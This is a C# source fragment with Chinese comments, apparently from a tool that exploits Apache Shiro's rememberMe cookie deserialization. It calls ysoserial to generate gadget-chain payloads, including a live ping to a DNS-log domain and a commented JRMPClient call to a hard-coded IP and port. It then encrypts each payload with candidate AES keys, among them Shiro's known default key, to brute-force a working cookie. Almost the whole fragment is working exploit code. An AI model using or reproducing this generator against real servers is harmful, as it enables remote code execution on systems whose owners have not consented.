// 获取reMemberMe
public static string get_rememberMe(string keyValue, string keyKey, string moduleValue, string moduleKey, string dnslogDomain)
{
// 生成一个序列化文件 payload.ser,以模块分线程并以模块名命名文件,防止冲突
Process p = new Process();
p.StartInfo.FileName = "cmd";
//p.StartInfo.Arguments = @"/c java -jar ysoserial.jar JRMPClient ""101.201.56.18:999"" > payload.ser";
//p.StartInfo.Arguments = @"/c java -jar ysoserial.jar CommonsCollections2 ""ping cc1.k2.65hos5.ceye.io"" > payload.ser";
p.StartInfo.Arguments = $@"/c java -jar ysoserial.jar {moduleValue} ""ping {moduleKey}.{keyKey}.{dnslogDomain}"" > {moduleValue}.ser";
//Console.WriteLine($"{moduleKey}.{keyKey}.{dnslogDomain}");
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.StartInfo.CreateNoWindow = true;
p.Start();
p.StandardOutput.ReadToEnd();
p.Dispose();
// 以字节形式读取 payload.ser
byte[] textBytes = File.ReadAllBytes($@"{moduleValue}.ser");
// new一个org.apache.shiro.crypto.AesCipherService,不需要额外设置,默认就是AES/128/CBC,只需循环key爆破
AesCipherService aesCipherService = new AesCipherService();
// base64解码keyS为keyB
byte[] keyB = Convert.FromBase64String(keyValue);
// 调用shiro加密方法并返回byteArray
byte[] encrptByte = aesCipherService.encrypt(textBytes, keyB).getBytes();
// base64编码
string encrptText = Convert.ToBase64String(encrptByte);
return("rememberMe=" + encrptText);
}
public static string getRememberMe(string keyS)
{
// 以字节形式读取 poc.ser
byte[] textBytes = File.ReadAllBytes($@"poc.ser");
// new一个org.apache.shiro.crypto.AesCipherService,不需要额外设置,默认就是AES/128/CBC
AesCipherService aesCipherService = new AesCipherService();
// base64解码keyS为keyB
// byte[] key = Convert.FromBase64String("kPH+bIxk5D2deZiIxcaaaA==");
byte[] keyB = Convert.FromBase64String(keyS);
// 调用shiro加密方法并返回byteArray
byte[] encrptByte = aesCipherService.encrypt(textBytes, keyB).getBytes();
// base64编码
string encrptText = Convert.ToBase64String(encrptByte);
return("rememberMe=" + encrptText);
}
